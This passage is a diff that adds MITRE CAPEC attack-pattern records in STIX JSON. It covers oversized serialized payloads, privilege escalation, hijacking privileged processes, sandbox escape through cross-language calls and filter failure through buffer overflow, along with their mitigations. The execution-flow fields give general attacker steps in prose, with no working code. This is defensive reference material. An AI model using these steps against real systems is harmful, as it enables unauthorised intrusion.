"attack-pattern--8abd01d1-b2a2-4b86-a640-7d3d3b61d27f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pick a robust implementation of the data parser.", + "id": "course-of-action--9ebad4d6-6c54-4d17-903f-4ad0ab05a641", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-230-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--14e9f6cc-aaff-41a7-b258-5c540335632f", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ebad4d6-6c54-4d17-903f-4ad0ab05a641", + "target_ref": "attack-pattern--8abd01d1-b2a2-4b86-a640-7d3d3b61d27f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary injects oversized serialized data payloads into a parser during data processing to produce adverse effects upon the parser such as exhausting system resources and arbitrary code execution.", + "external_references": [ + { + "external_id": "CAPEC-231", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/231.html" + }, + { + "external_id": "CWE-112", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/112.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-674", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/674.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Shlomo, Yona, XML Parser Attacks: A summary of ways to 
attack an XML Parser, 2007", + "external_id": "REF-89", + "source_name": "reference_from_CAPEC", + "url": "http://yeda.cs.technion.ac.il/~yona/talks/xml_parser_attacks/slides/slide2.html" + } + ], + "id": "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Oversized Serialized Data Payloads", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "XML Denial of Service (XML DoS)" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption", + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. An adversary determines the input data stream that is being processed by an serialized data parser on the victim's side.

Experiment

  1. An adversary crafts input data that may have an adverse effect on the operation of the data parser when the data is parsed on the victim's system.

", + "x_capec_extended_description": "\n Applications often need to transform data in and out of serialized data formats, such as XML and YAML, by using a data parser. It may be possible for an adversary to inject data that may have an adverse effect on the parser when it is being processed. By supplying oversized payloads in input vectors that will be processed by the parser, an adversary can cause the parser to consume more resources while processing, causing excessive memory consumption and CPU utilization, and potentially cause execution of arbitrary code. An adversary's goal is to leverage parser failure to their advantage. DoS is most closely associated with web services, SOAP, and Rest, because remote service requesters can post malicious data payloads to the service provider designed to exhaust the service provider's memory, CPU, and/or disk space. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--ee525a27-de33-45e9-ba7f-f63562001a5b", + "attack-pattern--da41d572-d779-44a8-b8bf-530f49c32861" + ], + "x_capec_prerequisites": [ + "An application uses an parser for serialized data to perform transformation on user-controllable data.", + "An application does not perform sufficient validation to ensure that user-controllable data is safe for a data parser." + ], + "x_capec_skills_required": { + "High": "Arbitrary code execution", + "Low": "Denial of service" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Carefully validate and sanitize all user-controllable serialized data prior to passing it to the parser routine. 
Ensure that the resultant data is safe to pass to the parser.", + "id": "course-of-action--e235322d-0b83-4799-860a-2681f51d6ea5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-231-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--abe2962c-e934-432f-9b1b-de3b76706fbc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e235322d-0b83-4799-860a-2681f51d6ea5", + "target_ref": "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a7f9b18e-bc2b-4981-ac34-7d93f9d6dde7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7ca13542-450d-4218-bd44-e0cf51b2ecc3", + "target_ref": "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pick a robust implementation of the serialized data parser.", + "id": "course-of-action--c7172552-a553-4ec3-ac05-d847c8f293e5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-231-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2938365a-8b0f-4d54-8471-81ea79d3ef9a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c7172552-a553-4ec3-ac05-d847c8f293e5", + "target_ref": "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Validate data against a valid schema or DTD prior to parsing.", + "id": "course-of-action--94c30519-b707-419d-b628-0f08718b908b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-231-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7a7e323e-7ab6-42f3-a56d-42335147b140", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--94c30519-b707-419d-b628-0f08718b908b", + "target_ref": "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness enabling them to elevate their privilege and perform an action that they are not supposed to be authorized to perform.", + "external_references": [ + { + "external_id": "CAPEC-233", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/233.html" + }, + { + "external_id": "CWE-269", + 
"source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/269.html" + }, + { + "external_id": "CWE-1264", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1264.html" + }, + { + "external_id": "CWE-1311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1311.html" + }, + { + "description": "Abuse Elevation Control Mechanism", + "external_id": "T1548", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1548" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-600", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/05-Authorization_Testing/03-Testing_for_Privilege_Escalation.html" + } + ], + "id": "attack-pattern--c05fff04-b965-4a11-9c18-379dac31969f", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Privilege Escalation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262" + ], + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--ebf5cbfb-36d8-4983-9267-9d17bff3817f", + "attack-pattern--9f1d96c7-fcc8-4708-b98d-23f1fd86e07b", + "attack-pattern--1cc991f7-9f62-4e6b-9e37-70fa23ab23e9", + "attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b", + "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary gains control of a process that is assigned elevated privileges in order to execute arbitrary code with those privileges. 
Some processes are assigned elevated privileges on an operating system, usually through association with a particular user, group, or role. If an attacker can hijack this process, they will be able to assume its level of privilege in order to execute their own code.", + "external_references": [ + { + "external_id": "CAPEC-234", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/234.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "external_id": "CWE-648", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/648.html" + } + ], + "id": "attack-pattern--9f1d96c7-fcc8-4708-b98d-23f1fd86e07b", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Hijacking a privileged process", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c05fff04-b965-4a11-9c18-379dac31969f" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find process with elevated priveleges: The adversary probes for processes running with elevated privileges.

  2. Techniques
    On Windows, use the process explorer's security tab to see if a process is running with administror privileges.
    On Linux, use the ps command to view running processes and pipe the output to a search for a particular user, or the root user.

Experiment

  1. Find vulnerability in running process: The adversary looks for a vulnerability in the running process that would allow for arbitrary code execution with the privilege of the running process.

  2. Techniques
    Look for improper input validation
    Look for a buffer overflow which may be exploited if an adversary can inject unvalidated data.
    Utilize system utilities that support process control that have been inadequately secured

Exploit

  1. Execute arbitrary code: The adversary exploits the vulnerability that they have found and hijacks the running process.

", + "x_capec_prerequisites": [ + "The targeted process or operating system must contain a bug that allows attackers to hijack the targeted process." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated. Please refer to CAPEC:30 - Hijacking a Privileged Thread of Execution.", + "external_references": [ + { + "external_id": "CAPEC-235", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/235.html" + } + ], + "id": "attack-pattern--19f01fde-7707-4938-afb5-daa22bf8c93f", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Implementing a callback to system routine (old AWT Queue)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it did not have enough distinction from CAPEC-30 : Hijacking a Privileged Thread of Execution. 
Please refer to CAPEC-30 moving forward.", + "external_references": [ + { + "external_id": "CAPEC-236", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/236.html" + } + ], + "id": "attack-pattern--6616521d-b2f8-49c0-95cd-587eab111f91", + "modified": "2021-10-21T00:00:00.000Z", + "name": "DEPRECATED: Catching exception throw/signal from privileged block", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The attacker may submit malicious code of another language to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox. For instance, Java code cannot perform unsafe operations, such as modifying arbitrary memory locations, due to restrictions placed on it by the Byte code Verifier and the JVM. If allowed, Java code can call directly into native C code, which may perform unsafe operations, such as call system calls and modify arbitrary memory locations on their behalf. To provide isolation, Java does not grant untrusted code with unmediated access to native C code. Instead, the sandboxed code is typically allowed to call some subset of the pre-existing native code that is part of standard libraries.", + "external_references": [ + { + "external_id": "CAPEC-237", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/237.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "J. Cappos, J. Rasley, J. Samuel, I. Beschastnikh, C. Barsan, A. Krishnamurthy, T. 
Anderson, Retaining Sandbox Containment Despite Bugs in Privileged Memory-Safe Code, The 17th ACM Conference on Computer and Communications Security (CCS '10), 2010", + "external_id": "REF-91", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Malware Protection Center: Threat Research and Response, 2007, Microsoft Corporation", + "external_id": "REF-92", + "source_name": "reference_from_CAPEC", + "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit%3AJava%2FByteVerify.C" + } + ], + "id": "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Escaping a Sandbox by Calling Code in Another Language", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--4abd48c8-f737-45db-bd7b-97d989ebd471" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Exploit: Java/ByteVerify.C is a detection of malicious code that attempts to exploit a vulnerability in the Microsoft Virtual Machine (VM). The VM enables Java programs to run on Windows platforms. The Microsoft Java VM is included in most versions of Windows and Internet Explorer. In some versions of the Microsoft VM, a vulnerability exists because of a flaw in the way the ByteCode Verifier checks code when it is initially being loaded by the Microsoft VM. 
The ByteCode Verifier is a low level process in the Microsoft VM that is responsible for checking the validity of code - or byte code - as it is initially being loaded into the Microsoft VM. Java/ByteVerify.C attempts to download a file named \"msits.exe\", located in the same virtual directory as the Java applet, into the Windows system folder, and with a random file name. It then tries to execute this specific file. This flaw enables attackers to execute arbitrary code on a user's machine such as writing, downloading and executing additional malware. This vulnerability is addressed by update MS03-011, released in 2003." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Probing: The attacker probes the target application to see whether calling code of another language is allowed within a sandbox.

  2. Techniques
    The attacker probes the target application to see whether calling code of another language is allowed within a sandbox.
  3. Analysis: The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox.

  4. Techniques
    The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox.

Experiment

  1. Verify the exploitable security weaknesses: The attacker tries to craft malicious code of another language allowed by the sandbox to verify the security weaknesses of the standard libraries found in the Explore phase.

  2. Techniques
    The attacker tries to explore the security weaknesses by calling malicious code of another language allowed by the sandbox.

Exploit

  1. Exploit the security weaknesses in the standard libraries: The attacker calls malicious code of another language to exploit the security weaknesses in the standard libraries verified in the Experiment phase. The attacker will be able to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox.

  2. Techniques
    The attacker calls malicious code of another language to exploit the security weaknesses in the standard libraries.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "The attacker must have a good knowledge of the platform specific mechanisms of signing and verifying code. Most code signing and verification schemes are based on use of cryptography, the attacker needs to have an understand of these cryptographic operations in good detail." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assurance: Sanitize the code of the standard libraries to make sure there is no security weaknesses in them.", + "id": "course-of-action--93d2ef31-a689-4f16-bf00-29334bcab36a", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-237-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b8d07f3e-4893-4581-9ddd-565364f55f22", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93d2ef31-a689-4f16-bf00-29334bcab36a", + "target_ref": "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use obfuscation and other techniques to prevent reverse engineering the standard libraries.", + "id": "course-of-action--223d8fc3-bfd2-4786-917f-9e09d40cd357", + "modified": 
"2020-12-17T00:00:00.000Z", + "name": "coa-237-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c1bf353f-a708-448c-8b53-22dadacd7c49", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--223d8fc3-bfd2-4786-917f-9e09d40cd357", + "target_ref": "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assurance: Use static analysis tool to do code review and dynamic tool to do penetration test on the standard library.", + "id": "course-of-action--c136203e-0b03-420c-828f-a1e4a8b0534b", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-237-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9627981c-870d-4aff-a472-cb655535e9f3", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c136203e-0b03-420c-828f-a1e4a8b0534b", + "target_ref": "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: 
Get latest updates for the computer.", + "id": "course-of-action--a6f9e9be-3354-4590-80a2-a451a7d8e128", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-237-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--22d46b75-55c1-431a-a27b-350b72fa6541", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a6f9e9be-3354-4590-80a2-a451a7d8e128", + "target_ref": "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it did not appear to be a valid attack pattern.", + "external_references": [ + { + "external_id": "CAPEC-238", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/238.html" + } + ], + "id": "attack-pattern--481983de-2023-47f1-be60-642556a65376", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Using URL/codebase / G.A.C. (code source) to convince sandbox of privilege", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it did not contain any content and did not serve any useful purpose. 
Please refer to \"CAPEC-207: removing Important Client Functionality\" going forward.", + "external_references": [ + { + "external_id": "CAPEC-239", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/239.html" + } + ], + "id": "attack-pattern--f7c4e923-3a66-458b-8bfe-bbeeebefe86a", + "modified": "2019-04-04T00:00:00.000Z", + "name": "DEPRECATED: Subversion of Authorization Checks: Cache Filtering, Programmatic Security, etc.", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack, the idea is to cause an active filter to fail by causing an oversized transaction. An attacker may try to feed overly long input strings to the program in an attempt to overwhelm the filter (by causing a buffer overflow) and hoping that the filter does not fail securely (i.e. 
the user input is let into the system unfiltered).", + "external_references": [ + { + "external_id": "CAPEC-24", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/24.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-733", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/733.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Filter Failure through Buffer Overflow", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Bypass Protection Mechanism" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Sending in arguments that are too long to cause the filter to fail open is one instantiation of the filter failure attack. The Taylor UUCP daemon is designed to remove hostile arguments before they can be executed. If the arguments are too long, however, the daemon fails to remove them. This leaves the door open for attack.\n ", + "A filter is used by a web application to filter out characters that may allow the input to jump from the data plane to the control plane when data is used in a SQL statement (chaining this attack with the SQL injection attack). Leveraging a buffer overflow the attacker makes the filter fail insecurely and the tainted data is permitted to enter unfiltered into the system, subsequently causing a SQL injection.", + "Audit Truncation and Filters with Buffer Overflow. 
Sometimes very large transactions can be used to destroy a log file or cause partial logging failures. In this kind of attack, log processing code might be examining a transaction in real-time processing, but the oversized transaction causes a logic branch or an exception of some kind that is trapped. In other words, the transaction is still executed, but the logging or filtering mechanism still fails. This has two consequences, the first being that you can run transactions that are not logged in any way (or perhaps the log entry is completely corrupted). The second consequence is that you might slip through an active filter that otherwise would stop your attack." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey: The attacker surveys the target application, possibly as a valid and authenticated user

  2. Techniques
    Spidering web sites for inputs that involve potential filtering
    Brute force guessing of filtered inputs

Experiment

  1. Attempt injections: Try to feed overly long data to the system. This can be done manually or a dynamic tool (black box) can be used to automate this. An attacker can also use a custom script for that purpose.

  2. Techniques
    Brute force attack through black box penetration test tool.
    Fuzzing of communications protocols
    Manual testing of possible inputs with attack data.
  3. Monitor responses: Watch for any indication of failure occurring. Carefully watch to see what happened when filter failure occurred. Did the data get in?

  4. Techniques
    Boron tagging. Choose clear attack inputs that are easy to notice in output. In binary this is often 0xa5a5a5a5 (alternating 1s and 0s). Another obvious tag value is all zeroes, but it is not always obvious what goes wrong if the null values get into the data.
    Check Log files. An attacker with access to log files can look at the outcome of bad input.

Exploit

  1. Abuse the system through filter failure: An attacker writes a script to consistently induce the filter failure.

  2. Techniques
    DoS through filter failure. The attacker causes the system to crash or stay down because of its failure to filter properly.
    Malicious code execution. An attacker introduces a malicious payload and executes arbitrary code on the target system.
    An attacker can use the filter failure to introduce malicious data into the system and leverage a subsequent SQL injection, Cross Site Scripting, Command Injection or similar weakness if it exists.
